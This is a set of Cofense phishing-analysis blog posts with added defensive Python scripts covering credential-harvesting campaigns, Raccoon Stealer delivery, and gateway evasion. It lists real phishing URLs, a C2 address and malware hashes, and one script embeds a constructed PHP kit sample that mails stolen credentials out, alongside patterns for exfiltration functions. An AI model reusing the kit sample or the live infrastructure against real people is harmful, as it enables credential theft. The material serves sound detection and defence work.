Phishers Are Using Google Forms to Bypass Popular Email Gateways

By Kian Mahdavi

Over the past couple of weeks, the Cofense Phishing Defense Center (PDC) has witnessed an increase in phishing campaigns that harvest credentials from unsuspecting email recipients by tricking them into ‘updating their Office 365’ via a Google Form.

Google Forms, part of Google’s free web-based Docs suite, lets anyone build a form and collect the responses. That makes it an attractive, zero-cost credential-harvesting backend: the attacker gets a page on a trusted Google domain with a valid certificate, and everything submitted lands in their own Google account. Here’s how it works:

Figure 1 – Email Header

The phishing email originates from a compromised mailbox at CIM Finance, a legitimate financial services provider, and the threat actor used CIM Finance’s infrastructure to send the phishing emails. Because the messages really left that domain’s authorised mail servers, they pass basic email authentication checks such as DKIM and SPF; as the headers in figure 1 show, both returned a pass. This is the practical limit of sender authentication: SPF, DKIM and DMARC verify that the sending domain is who it claims to be, not that the account behind it is still in its owner’s hands, so a gateway that weights a clean authentication result heavily lets a compromised-account phish straight through.

The threat actor built the lure as a Google Form styled to look like a Microsoft page. Because the form is served from docs.google.com, the browser shows Google’s valid TLS certificate and padlock, which recipients read as proof that they have reached a Microsoft page associated with their company. The certificate only proves that the connection to Google is genuine; it says nothing about who created the form. The link in the email points to an external Google-hosted address such as

hXXps://docs[.]google[.]com/forms/d/e/1FAIpQLSfzgrwZB23BXv6vumZljSGg0mUuYP4UcafmShTpUzWJoYzBPA/viewform.

Figure 2 – Email Body

The email masquerades as a notification from the “IT corporate team,” telling the business user to “update your Office 365,” which has supposedly expired. The “administrator” claims that immediate action is required or the account will be placed on hold. The lure trades on how much users depend on email access: the threat of losing it is meant to make recipients panic, click the phishing link and hand over their credentials.

Figure 3 – Phishing Page

Clicking the link lands the user on a crude imitation of the Microsoft Office 365 login page (figure 3) that does not follow Microsoft’s visual style. Capitalisation is inconsistent and some letters have been replaced with asterisks, for example in the words ‘email’ and ‘password.’ In addition, credentials typed into the form appear in plain text rather than as asterisks, since Google Forms has no masked password field; that alone is a red flag that the login page is not real. Once the user submits the form, the responses are stored in the attacker’s Google account, where they can be read from Google Drive.
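As an added example (not part of the original post and not Cofense code), the Python below shows the triage logic the analysis above implies: treat a clean Authentication-Results line as proof of the sending domain only, and look instead for the mismatch between the brand named in the lure and the host that serves the link. The message, the vendor-finance.example sender, the FREE_HOSTING set and the BRAND_DOMAINS table are all constructed assumptions for the demonstration.

```python
import email
import re
from email import policy
from urllib.parse import urlparse

# Free form/file platforms an IT team would not use for an "account update"
# (assumption for this example; extend to taste).
FREE_HOSTING = {"docs.google.com", "forms.gle", "sites.google.com"}
# Brand keyword -> registrable domains that legitimately host its login
# (assumption: a small table, not an exhaustive list).
BRAND_DOMAINS = {
    "office 365": {"microsoftonline.com", "office.com", "microsoft.com"},
    "docusign": {"docusign.net", "docusign.com"},
}
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=(\w+)", re.I)

# Constructed message: authenticated sender, brand lure, off-platform link.
SAMPLE = """\
From: Accounts <accounts@vendor-finance.example>
To: user@victim.example
Subject: Update your Office 365
Authentication-Results: mx.victim.example;
 spf=pass smtp.mailfrom=vendor-finance.example;
 dkim=pass header.d=vendor-finance.example;
 dmarc=pass header.from=vendor-finance.example
Content-Type: text/plain; charset="utf-8"

IT corporate team: your Office 365 has expired. Update now or the account
will be placed on hold: https://docs.google.com/forms/d/e/EXAMPLE/viewform
"""


def auth_results(msg):
    """Parse spf/dkim/dmarc verdicts out of Authentication-Results."""
    return {k.lower(): v.lower() for k, v in
            AUTH_RE.findall(msg.get("Authentication-Results", ""))}


def registrable(host):
    """Naive registrable domain: last two labels (fine for .com/.example)."""
    return ".".join(host.lower().split(".")[-2:])


def triage(raw):
    """Return the findings an analyst would want on one message."""
    msg = email.message_from_string(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("plain", "html")).get_content()
    text = (str(msg.get("Subject", "")) + " " + body).lower()
    findings = []
    auth = auth_results(msg)
    # A pass proves the From domain's servers sent it, nothing more: a
    # compromised mailbox at that domain passes SPF, DKIM and DMARC.
    if auth.get("spf") == "pass" and auth.get("dkim") == "pass":
        findings.append("sender authenticated: treat as possible compromised account")
    brands = [b for b in BRAND_DOMAINS if b in text]
    for url in URL_RE.findall(body):
        host = (urlparse(url).hostname or "").lower()
        if host in FREE_HOSTING:
            findings.append(f"link hosted on free platform: {host}")
        for brand in brands:
            if registrable(host) not in BRAND_DOMAINS[brand]:
                findings.append(f"'{brand}' lure links to off-brand host {host}")
    return findings
```

The authentication check is deliberately reported as a finding rather than a pass: in a compromised-account phish the clean result is exactly what lets the message through, so it belongs in the analyst’s view next to the brand mismatch.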

 

Network IOC

URL: hXXps://docs[.]google[.]com/forms/d/e/1FAIpQLSfzgrwZB23BXv6vumZljSGg0mUuYP4UcafmShTpUzWJoYzBPA/viewform
IP:  172[.]217[.]7[.]238 (a Google front-end address shared with legitimate Google services; alert or block on the form URL, not the address)

 

HOW COFENSE CAN HELP

75% of threats reported to the Cofense Phishing Defense Center are credential phish. Protect the keys to your kingdom—condition end users to be resilient to credential harvesting attacks with Cofense PhishMe through the “Account Security Alert” or “Cloud Login” templates and get visibility of attacks with Cofense Reporter.

Quickly turn user reported emails into actionable intelligence with Cofense Triage. Reduce exposure time by rapidly quarantining threats with Cofense Vision.

Easily consume phishing-specific threat intelligence to proactively defend your organization against evolving threats with Cofense Intelligence. Cofense Intelligence customers received further information about this threat in Active Threat Report (ATR) 36388.

Thanks to our unique perspective, no one knows more about REAL phishing threats than Cofense. To understand them better, read the 2019 Phishing Threat & Malware Review.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog, are registered trademarks or trademarks of Cofense Inc.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

Raccoon Stealer Found Rummaging Past Symantec and Microsoft Gateways

By Max Gannon and Alan Rainer, Cofense IntelligenceTM

Threat actors continue to exploit legitimate services to trick users, as seen in the latest campaign using Raccoon Stealer malware, aimed at a financial organization and delivered via a Dropbox-hosted .IMG file. Raccoon Stealer, a rather unsophisticated piece of malware that came to light around April 2019, is sold on underground forums in both Russian and English and features an easy-to-use interface, around-the-clock customer support, and highly active development. Buyers distribute it however they see fit. In this campaign the actors hosted a malicious .IMG disk image on a Dropbox share, and the email carrying the link bypassed the Symantec Email Security and Microsoft EOP gateways. When the victim opens the image, Windows 8 and later mount it as a drive, exposing the Raccoon Stealer executable (SCAN DOC.exe in the hashes below), which infects the machine when run.

The email used in this campaign was delivered to the inbox of an employee of a financial institution. Figure 1 shows the email signature and originator address which probably belong to a compromised user. Using the familiar theme of a wire transfer—closely akin to those often seen in Business Email Compromise (BEC) scams—the threat actors look to trick users into opening the Dropbox URL and downloading the malicious file.

Educating users on spotting these types of scams and carefully scrutinizing emails that originate outside the organization are great ways to thwart this threat. Cofense IntelligenceTM Indicators of Compromise (IOCs) provided via our feed and noted in the appendix below can be used to fortify network defense and endpoint protection solutions.

Technical Findings

In the past, CofenseTM has seen Raccoon Stealer delivered as a direct attachment and via RTF documents exploiting CVE-2017-8570, in campaigns targeting sectors such as utilities. In this most recent campaign, a potentially compromised email account was used to send the email shown in Figure 1. It passed the Symantec Email Security and Microsoft EOP gateways with the Dropbox URL intact: neither gateway removed or rewrote the link in a way that would have stopped victims from clicking it and downloading the payload.

Figure 1: Email delivering Dropbox URL

Raccoon Stealer is a relatively new malware that first appeared on the market around April 2019. Due to Raccoon Stealer’s ease of use and range of capabilities that allow for quick monetization of infected users, it is becoming increasingly popular. Although not particularly advanced or subtle with its network activity and processes, the malware can quickly gather and exfiltrate data as well as download additional payloads.

Initial contact with the command and control (C2) server is an HTTP POST that carries the “bot ID” and “configuration ID”. The C2 responds with a JSON object that spells out the C2 settings and the download locations for the libraries and additional files the malware needs, as shown in Figure 2. Because this exchange is plain HTTP, the payload URLs can be recovered from a packet capture or proxy log and turned into indicators.

Figure 2: Configuration Data From C2

The payload URLs currently deliver a set of DLLs, as specified by the “attachment url” and “libraries” parameters, but future development could easily allow threat actors to use Raccoon Stealer as a loader for other malware to generate additional income.

The use of several distinct delivery methods in a relatively short time, including the Fallout Exploit Kit, may indicate adoption by numerous threat actors, as predicted in prior Cofense research. Given the variety of delivery options, Raccoon Stealer could be a problem for organizations that focus too heavily on one infection vector.
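To turn the chain described above into detection logic, here is an added example (written for this page; not Cofense’s code and not the malware author’s) that correlates proxy-log lines per client: a forced download (dl=1) of a disk image from Dropbox, followed by a POST to a Raccoon check-in path and GETs of the payload files. The log lines, the 203.0.113.9 address and the JSON reply are constructed; the URL paths are the ones in Table 1, and the JSON key names are an assumption because the post names the fields but does not show the schema.

```python
import json
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Stage 1: forced download (dl=1) of a disk image from a file-sharing host.
SHARE_HOSTS = {"www.dropbox.com", "dl.dropboxusercontent.com"}
IMAGE_EXT = (".img", ".iso", ".vhd")
# Stages 2-3: Raccoon check-in and payload fetches. Paths from Table 1;
# the C2 host is not hard-coded because it changes between campaigns.
C2_PATHS = {"/file_handler/file.php", "/gate/log.php"}
PAYLOAD_PATHS = {"/gate/libs.zip", "/gate/sqlite3.dll"}

# Constructed proxy log: "<client> <method> <url> <status> <bytes>".
# 203.0.113.9 is a documentation address standing in for the C2.
LOG = """\
10.1.1.5 GET https://www.dropbox.com/s/abc123/SCAN%20DOC.IMG?dl=1 200 84213
10.1.1.5 POST http://203.0.113.9/file_handler/file.php 200 912
10.1.1.5 GET http://203.0.113.9/gate/libs.zip 200 1638400
10.1.1.5 GET http://203.0.113.9/gate/sqlite3.dll 200 884736
10.1.1.7 GET https://www.dropbox.com/s/xyz789/report.pdf?dl=1 200 20480
10.1.1.8 POST http://203.0.113.9/gate/log.php 200 512
"""
LINE_RE = re.compile(r"^(\S+) (GET|POST) (\S+) (\d{3}) (\d+)$")

# Constructed C2 reply. The post names "attachment url" and "libraries"
# but does not show the schema, so these key names are an assumption.
SAMPLE_CONFIG = json.loads("""{
  "ip": "203.0.113.9",
  "attachment_url": "http://203.0.113.9/gate/libs.zip",
  "libraries": ["http://203.0.113.9/gate/sqlite3.dll"]
}""")


def classify(url, method):
    """Map one request to a stage of the chain, or None."""
    u = urlparse(url)
    path = u.path.lower()
    if (u.hostname in SHARE_HOSTS and path.endswith(IMAGE_EXT)
            and parse_qs(u.query).get("dl") == ["1"]):
        return "image_download"
    if method == "POST" and path in C2_PATHS:
        return "c2_checkin"
    if method == "GET" and path in PAYLOAD_PATHS:
        return "payload_fetch"
    return None


def detect(log):
    """Return {client: [stages]} for every client that checked in to a C2."""
    stages = defaultdict(list)
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, method, url, _status, _size = m.groups()
        stage = classify(url, method)
        if stage:
            stages[client].append(stage)
    return {c: s for c, s in stages.items() if "c2_checkin" in s}


def urls_in_config(obj):
    """Collect every http(s) URL anywhere in the C2's JSON reply, without
    depending on key names, so new payload locations become IOCs at once."""
    found = []
    if isinstance(obj, dict):
        for v in obj.values():
            found.extend(urls_in_config(v))
    elif isinstance(obj, list):
        for v in obj:
            found.extend(urls_in_config(v))
    elif isinstance(obj, str) and obj.startswith(("http://", "https://")):
        found.append(obj)
    return found
```

The disk-image download on its own is only a weak signal (legitimate .ISO downloads happen), which is why detect() keys on the check-in and reports the download as context; a client showing the full sequence is the one to isolate first.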

Table 1: Indicators of Compromise

Dropbox URL (delivery):
  hXXp://www[.]dropbox[.]com/s/g6pz8dm4051rs0o/SCAN%20DOC[.]IMG?dl=1

Raccoon Stealer C2 location:
  34[.]89[.]185[.]248
  hXXp://34[.]89[.]185[.]248/file_handler/file[.]php
  hXXp://34[.]89[.]185[.]248/gate/libs[.]zip
  hXXp://34[.]89[.]185[.]248/gate/log[.]php
  hXXp://34[.]89[.]185[.]248/gate/sqlite3[.]dll

Raccoon Stealer hashes (MD5):
  SCAN DOC.IMG    0c8158e2a4267eea51e12b6890e68da8
  SCAN DOC.exe    f7bcb18e5814db9fd51d0ab05f2d7ee9

HOW COFENSE CAN HELP

Cofense PhishMeTM offers a simulation template, “Dropbox Wire Transfer – Raccoon Stealer,” to educate users on the phishing tactic described in today’s blog.

Cofense IntelligenceTM: ATR IDs 32407, 31881, 31977

Cofense TriageTM: PM_Intel_Raccoon_31881, PM_Intel_Raccoon_31977

100% of malware-bearing phishing threats analyzed by the Cofense Phishing Defense CenterTM were reported by end users. 0% were stopped by technology. Condition users to be resilient to evolving phishing attacks with Cofense PhishMeTM and remove the blind spot with Cofense ReporterTM.


 


Phishing Emails Are Using SharePoint to Slip Past Symantec’s Gateway and Attack Banks

Hiding in plain sight behind trusted enterprise technologies almost guarantees delivery of a phishing URL. Case in point: a phishing campaign that used a legitimate SharePoint URL to get past the email gateway, in this case Symantec’s. Here’s how this increasingly popular phishing tactic works.

Email Body

The phishing email is sent from a compromised account at a third-party vendor and asks the recipient to review a proposal document by clicking an embedded URL. As figure 1 shows, the URL has been wrapped by Symantec’s Click-time URL Protection and leads to a compromised SharePoint site. The gateway only ever sees the SharePoint link, a legitimate Microsoft URL; the malicious URL is served from the SharePoint page one stage later, where email perimeter controls no longer look. That is why the tactic works against just about any email gateway that judges a message by the URLs it contains.

Figure 1: email body

The embedded URL in the email body delivers the recipient to a compromised SharePoint site where a malicious OneNote document is served. The document is illegible and invites the recipient to download it by clicking on yet another embedded URL, which leads to the main credential phishing page.

Figure 2: Malicious OneNote Document

Phishing Page

The phishing page is a cheap imitation of the OneDrive for Business login portal. There, the recipient is given two options to authenticate, with their O365 Login credentials or by choosing to login with any other email provider. We see this tactic quite often as it increases the chances that the recipient will log in.

Figure 3: Phishing Pages

Downloading the kit files from the compromised server shows how credentials leave the phishing form: they are posted to login.php, which sends them on to a Gmail account controlled by the operator.

Figure 4: Login.php

Other files harvested from the compromised server shed light on the origin of this attack. Below is a readme file that instructs the operator on how to configure and install the phishing page on a compromised web server. We have also identified that this phishing kit is part of a series of “Hacking tools” built and sold by BlackShop Tools.

Figure 5: readme.txt
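For analysts who retrieve a kit like this one, the added example below (my code, not the BlackShop kit and not part of the original post) scans the PHP sources for the three things worth pulling out before the server disappears: which form fields are collected, which functions send them somewhere, and what mailbox receives them. The login.php content is a constructed stand-in modelled on the behaviour described above, and the kit.operator.example@gmail.com address is made up.

```python
import re

# Constructed kit files modelled on the behaviour described in the post
# (collect the form, mail it, bounce the victim to the real site).
# This is not the BlackShop kit and the address is made up.
KIT_FILES = {
    "index.php": '<form action="login.php" method="POST">'
                 '<input name="email"><input name="password"></form>',
    "login.php": r"""<?php
$email = $_POST['email']; $pass = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$to = "kit.operator.example@gmail.com";
$msg = "Email: $email\nPass: $pass\nIP: $ip";
mail($to, "OneDrive Result", $msg);
header("Location: https://onedrive.live.com/");
?>""",
}

POST_RE = re.compile(r"\$_POST\[\s*['\"]([^'\"]+)['\"]\s*\]")
# Common exfiltration sinks in PHP kits: mail(), HTTP clients, raw sockets.
SINK_RE = re.compile(r"\b(mail|curl_exec|file_get_contents|fsockopen)\s*\(")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
REDIRECT_RE = re.compile(r"header\(\s*['\"]Location:\s*([^'\"]+)['\"]")


def triage_file(src):
    """Fields harvested, exfil sinks, recipient addresses, final redirect."""
    m = REDIRECT_RE.search(src)
    return {
        "fields": sorted(set(POST_RE.findall(src))),
        "sinks": sorted(set(SINK_RE.findall(src))),
        "addresses": sorted(set(EMAIL_RE.findall(src))),
        "redirect": m.group(1) if m else None,
    }


def triage_kit(files):
    """Per-file report; files with no sink or address are listed too so the
    analyst can see which page is the form and which one exfiltrates."""
    return {name: triage_file(src) for name, src in files.items()}


def exfil_addresses(files):
    """Every mailbox any file in the kit sends to: the first thing to report
    to the provider and the best pivot for finding the operator's other kits."""
    return sorted({a for r in triage_kit(files).values() for a in r["addresses"]})
```

The redirect target matters as much as the mailbox: after submitting, the victim is sent to the real service and sees nothing wrong, which is why these kits go unreported until the harvested account is abused.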

IOCs:

Malicious URL(s):

hxxps://botleighgrange-my[.]sharepoint[.]com/:o:/p/maintenance/EngTNCs22_REkaJY4gVf9lwBqkwYFtDSmJJ7L2H-AnoDQg?e=tgtauL
hxxps://alblatool[.]com/xxx/one/
hxxps://alblatool[.]com/xxx/one/office365/index[.]php

Associated IP(s):

13[.]107[.]136[.]9 (a Microsoft SharePoint Online front end shared with legitimate tenants; block the site URL, not the address)
198[.]54[.]126[.]160

 

HOW COFENSE CAN HELP

To defend against the attack described in today’s blog, Cofense offers:

 

Over 91% of credential harvesting attacks bypassed secure email gateways. Remove the blind spot—get visibility of attacks with Cofense ReporterTM.

Attackers do their research. Every SaaS platform you use is an opportunity for attackers to exploit it. Understand what SaaS applications are configured for your domains—do YOUR research with Cofense CloudSeekerTM.

 


Updated Sep. 12

This Phish Uses DocuSign to Slip Past Symantec Gateway and Target Email Credentials

By Tej Tulachan

The Cofense Phishing Defense CenterTM has observed a new wave of phishing attacks masquerading as an email from DocuSign to target the credentials of all major email providers. DocuSign is an electronic signature technology that facilitates exchanges of contracts, tax documents, and legal materials. Threat actors utilize this legitimate application to bypass the email gateway and entice users into handing out their credentials. Here’s how it works.

Email Body

At first glance, the email body looks well-presented, with the correct DocuSign logo and convincing content. However, there is something suspicious in the first line of the message: the recipient’s name is absent, just “Good day.” Looking deeper into the message body, we can see an embedded hyperlink pointing to hxxps://ori8aspzxoas[.]appspot[.]com/gfi8we/, a Google App Engine hostname rather than anything belonging to DocuSign.

Figure.1

Email Header

The email header shows that the message originated from the domain narndeo-tech[.]com. Further investigation reveals the domain is hosted with Hetzner Online GmbH, a well-known hosting company based in Germany. Nothing in the headers ties the message to a genuine DocuSign sending domain.

From: Lxxxx Mxxx <xxxxxx22@narndeo-tech[.]com>

To: R______ L_______ <unsuspecting.victim@example.com>

Message-ID: <20190716055127.3AEBF4689BD125B3[@]narndeo-tech[.]com>

Subject: New Docu-Sign

X-Env-Sender: lesliemason22[@]narndeo-tech[.]com

Phishing Page

When users click on the embedded link, it redirects to a phishing page as shown below in figure 2. Here the attacker gives six separate options for users to enter their credentials to access the DocuSign document, increasing the likelihood this phisher gets a bite.

Figure.2

Once the user clicks on the given option, it redirects to the main phishing page as shown below in three versions, Office 365, Gmail, and iCloud.

Figure.3

Email Gateway: This threat was found in an environment running Symantec Email Security.cloud.


IOC

hxxps://ori8aspzxoas[.]appspot[.]com/gfi8we/

108[.]177[.]111[.]153 (a Google App Engine front end shared with legitimate appspot.com applications; alert on the hostname rather than the address)

Recommendation:

Cofense™ cautions its customers to be wary of emails containing suspicious links or attachments. Specific to this sample, we recommend that customers be observant for emails that instruct users to provide their credentials. If your organization uses DocuSign as part of its business processes, remind users how they should expect legitimate notifications according to your internal standards. Cofense PhishMe™ customers may consider launching simulations that follow this style of attack to further train their users to detect and report suspicious emails.  A simulation template is available as “Completed Document,” which is based on a real phishing campaign. We also have existing newsletter (Announcement) content available to send to your users.

Reference: https://www.docusign.com/sites/default/files/Combating_Phishing_WP_05082017.pdf


 


Phishing Attackers Are Abusing WeTransfer to Evade Email Gateways

By Jake Longden

The Cofense Phishing Defense Center has observed a wave of phishing attacks that utilize the legitimate file hosting site WeTransfer to deliver malicious URLs to bypass email gateways. The attacks span major industries like banking, power, and media. Here’s how they work.

Email Body:

The email body is a genuine notification from WeTransfer informing the victim that a file has been shared with them. The attackers use what appear to be compromised email accounts to send a genuine link to a WeTransfer-hosted file. Because the link really does point to WeTransfer, it passes straight through security checks at the gateway; there is nothing malicious in the email itself to detect.

WeTransfer allows for the addition of a note to the email to clarify why the file was sent. Here, the threat actor will often write a note stating that the file is an invoice to be reviewed. This is a commonly observed phishing technique to pique the user’s interest.

Fig 1. Email body

Phishing Page:

When the user clicks the “Get your files” button in the message body, they are taken to the WeTransfer download page, where an .htm or .html file is hosted and downloaded by the unsuspecting victim. Opening that HTML file in a browser redirects the user to the main phishing page, so the malicious URL travels inside the downloaded file rather than in the email.

Fig 2. WeTransfer Hosted file
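The downloaded HTML file is the only place the phishing URL appears, so the useful analyst step is to extract the redirect target without opening the file in a browser. The added example below (not part of the original post) does that for the three redirect forms these lures commonly use: a meta refresh, a JavaScript location assignment, and a form that posts directly to the phishing host. SAMPLE_HTML and the invoice-portal.example host are constructed for the demonstration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed lure: three redirect mechanisms at once so every path is shown.
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="0; url=https://invoice-portal.example/o365/">
<script>window.location.href = "https://invoice-portal.example/o365/?ref=wt";</script>
</head><body>
<form action="https://invoice-portal.example/o365/login.php" method="post">
<input name="email"><input name="password" type="password"></form>
</body></html>"""

JS_RE = re.compile(r"""(?:window\.|document\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']""")
META_RE = re.compile(r"url\s*=\s*['\"]?([^'\"\s;]+)", re.I)


class LureParser(HTMLParser):
    """Collect every place the page can send the victim, plus form fields."""

    def __init__(self):
        super().__init__()
        self.destinations = []   # (mechanism, url) in document order
        self.inputs = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = META_RE.search(a.get("content") or "")
            if m:
                self.destinations.append(("meta-refresh", m.group(1)))
        elif tag == "form" and a.get("action"):
            self.destinations.append(("form-post", a["action"]))
        elif tag == "input" and a.get("name"):
            self.inputs.append(a["name"])
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands <script> bodies to handle_data unparsed.
        if self._in_script:
            for url in JS_RE.findall(data):
                self.destinations.append(("javascript", url))


def analyze_lure(html):
    """Destinations, the distinct hosts behind them, and harvested fields."""
    p = LureParser()
    p.feed(html)
    p.close()
    hosts = sorted({h for h in (urlparse(u).hostname for _, u in p.destinations) if h})
    return {"destinations": p.destinations, "hosts": hosts, "inputs": p.inputs}
```

Obfuscated lures (base64 bodies unpacked with atob, or a location built from string fragments) will defeat these regexes; when the script looks like that, the safe next step is a sandboxed browser with network capture rather than a smarter pattern.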

In the final stage of the attack, victims are asked to enter their Office365 credentials to login. More often than not, we see a Microsoft Service being targeted, however we have observed other targeted brands.

Fig 3. Phishing Page

Gateway Evasion

As WeTransfer is a well-known and trusted file hosting service, used to share files too large to attach to an email, these links typically pass through gateways as benign unless settings are modified to restrict access to such file-sharing sites. The PDC has observed this attack method bypass multiple gateways, including Proofpoint, Office 365 Safe Links and Symantec.

Useful Resources for Customers

Cofense Triage YARA rule: PM_WeTransfer_File_Download
Cofense PhishMe template: “File Transfer”
Cofense Intelligence: https://www.threathq.com/p42/search/default#m=26412&type=renderThreat


Other Ways Cofense Can Help

The Cofense Phishing Defense Center identifies active phishing attacks in enterprise environments. Learn how our dedicated experts provide actionable intelligence to stop phishing threats.

Cofense PhishMeTM offers a phishing simulation to condition users against file-transfer attacks like the one described in this blog.

 


Under the Radar – Phishing Using QR Codes to Evade URL Analysis

Phishing attacks evolve over time, and attacker frustration with technical controls is a key driver in the evolution of phishing tactics.

In today’s modern enterprise, it’s not uncommon for our emails to run the gauntlet of security products that wrap or scan embedded URLs with the hope of finding that malicious link. Products like Proofpoint URL Defense, Microsoft Safe Links, and Mimecast URL Protect hope to prevent phishing attacks by wrapping or analyzing URLs.  These technologies can only be effective IF they can find the URLs in the first place.

Fast forward to this week where our Phishing Defense Center™ stopped a phishing campaign aimed at customers in Finance. The analysis below outlines the attacker’s use of a URL encoded in a QR code to evade the above-named technologies.  While you’ve probably seen QR codes in your everyday life, this might be the first time you are seeing QR codes used as a phishing tactic.

The Phish:

The email itself is relatively simple. It poses as a pseudo SharePoint email with the subject line: “Review Important Document”. The message body invites the victim to: “Scan Bar Code To View Document”. The only other visible content is a tantalizing QR code that a curious user may be tempted to scan.

Figure 1, Email Body

The message body in plain text consists of several basic HTML elements for styling and an embedded .gif image file of the QR code. Very basic, but very effective.
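Because the URL lives inside an image, a gateway that only rewrites or scans links sees nothing to act on. The added example below (not part of the original post) shows the structural signal that remains: a short body, no URL in either text part, a call to scan something, and an inline image. The MIME message is constructed with Python’s email library, the GIF bytes are a placeholder rather than a real QR code, and decoding the code itself would need an extra library such as pyzbar, which is deliberately left out so the script runs offline.

```python
import email
import re
from email import policy
from email.message import EmailMessage

URL_RE = re.compile(r"https?://\S+", re.I)
SCAN_RE = re.compile(r"\b(scan|qr|bar ?code)\b", re.I)
MAX_TEXT = 300   # assumption: a lure like this carries very little text


def build_sample():
    """Constructed lookalike of the message in Figure 1: short body in text
    and HTML, one inline GIF, and not a single clickable link. The image
    bytes are a placeholder, not a real QR code."""
    msg = EmailMessage()
    msg["From"] = "SharePoint <share@docs-notify.example>"
    msg["To"] = "user@victim.example"
    msg["Subject"] = "Review Important Document"
    msg.set_content("Scan Bar Code To View Document")
    msg.add_alternative(
        '<p style="font-size:14px">Scan Bar Code To View Document</p>'
        '<img src="cid:qr1">', subtype="html")
    html_part = msg.get_payload()[1]
    html_part.add_related(b"GIF89a\x01\x00\x01\x00", "image", "gif", cid="<qr1>")
    return msg.as_string()


def image_only_lure(raw):
    """Flag a message that asks the reader to scan something, carries an
    image, and has no URL a link-rewriting gateway could ever have seen."""
    msg = email.message_from_string(raw, policy=policy.default)
    text_chars, urls, images, scan_hint = 0, 0, [], False
    for part in msg.walk():
        ctype = part.get_content_type()
        if ctype in ("text/plain", "text/html"):
            content = part.get_content()
            text = re.sub(r"<[^>]+>", " ", content)   # drop tags before counting
            text_chars += len(text.strip())
            urls += len(URL_RE.findall(content))
            scan_hint = scan_hint or bool(SCAN_RE.search(text))
        elif part.get_content_maintype() == "image":
            images.append((ctype, len(part.get_payload(decode=True))))
    suspicious = bool(images) and urls == 0 and scan_hint and text_chars < MAX_TEXT
    return {"suspicious": suspicious, "urls": urls, "images": images,
            "scan_hint": scan_hint, "text_chars": text_chars}
```

A mail flow rule built on this shape (image present, no URL, scan wording) will not catch everything, but it fires on exactly the case the link-scanning products cannot see, and it can route the message to a queue where the image is decoded by something that does understand QR codes.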

When the QR code is decoded we can see that that it contains a phishing URL: hxxps://digitizeyourart.whitmers[.]com/wp-content/plugins/wp-college/Sharepoint/sharepoint/index.php

Most smartphone QR code scanner apps open the decoded URL in the phone’s browser with little more than a tap. In this case the victim lands on a SharePoint-branded phishing site and is offered sign-in via AOL, Microsoft, or “Other” account services. While this sounds like a simple phish, there is a more nefarious tactic in play: moving the user off the corporate network and onto a device the business does not control.

Figure 2, Phishing site

Standard Security Controls Circumvented:

By enticing the victim to pull out their smartphone and scan the QR code the attacker manages to evade standard corporate security controls. Secure email gateways, link protection services, sandboxes, and web content filters no longer matter because the user is now interacting with the phishing site in their own security space: their mobile phone. And yes, the phishing site is optimized for mobile viewing. Here’s a glance at what the site looks like on a smartphone:

Figure 3, Phishing page viewed on phone

Though the user may now be using their personal device to access the phish, they are still in the “corporate” mindset as the original email was received at their business email address. Therefore, it is highly likely that the victim would input their corporate account credentials to attempt to access this “document”. 

Gateway Evasion:

This attack was observed passing through an environment utilizing Symantec Messaging Gateway. When scanned, the message was deemed “Not spam” by the system as seen in Fig 4 below.

Figure 4, Email Header Snippet

Conclusion:

In the past QR codes were reserved for geeks on the bleeding edge of technology. Today we interact with QR codes more and more as we cut the cord on cable, setup home internet devices, transact crypto currencies, etc…  Will QR codes be a common phishing tactic of the future? Time will tell.  But THIS phishing attack that snuck past best in class phishing technologies was only stopped by an informed, in tune human, who reported it with Cofense Reporter ™ , so that their security teams could stop it.

Today over 90% of phishing threats observed by the Cofense Phishing Defense Center ™ bypassed secure email gateways. Condition users to be resilient to evolving phishing attacks with Cofense PhishMe ™ and remove the blind spot with Cofense Reporter.

 


Phishing Attacks on High Street Target Major Retailer

By Jake Longden

The Cofense Phishing Defense Center™ has observed a phishing campaign that purports to be from Argos, a major retailer in the UK and British High Street. During 2018, Argos was the subject of a large number of widely reported phishing scams [i]; this threat specifically targets Argos customers for their personal information and looks like a continuation of what was seen last year.

With the goal of stealing your store credit card and login information, here’s how it works:


Fig 1. Email Body

Email Body:

The message itself follows a standard phishing template, informing the user that their account has been restricted and that sign-in is required for verification. The bad grammar and typos are a dead giveaway that this email is not genuine.

Message body in plain text:

In reviewing the body of the email, we see the hyperlink for “Sign into your account” which directs the potential victim to: hxxps://www[.]argos[.]co[.]uk[.]theninja[.]gknu[.]com/www[.]argos[.]co[.]uk/account-login/

The attacker repeatedly used the string of the legitimate Argos site in the URL, both as part of the subdomains, and as a subdirectory. This was an attempt to mask the true source, and to lure the victim into trusting the legitimacy of the website.

Upon examination, we see that the link is wrapped by a URL filtering service.

href="hxxps://clicktime[.]symantec[.]com/3AuyExDNpRSjkQbgT2gXygH6H2?u=hxxps://www[.]argos[.]co[.]uk[.]theninja[.]gknu[.]com/www[.]argos[.]co[.]uk/account-login/" target="_blank" rel="noopener"><span class="ox-dad7652f0e-m_609589041267919212link-blue ox-dad7652f0e-m_609589041267919212MsoHyperlink ox-dad7652f0e-m_609589041267919212MsoHyperlinkFollowed">SIGN
INTO YOUR ACCOUNT

Fig 2. Email Body in Plain Text
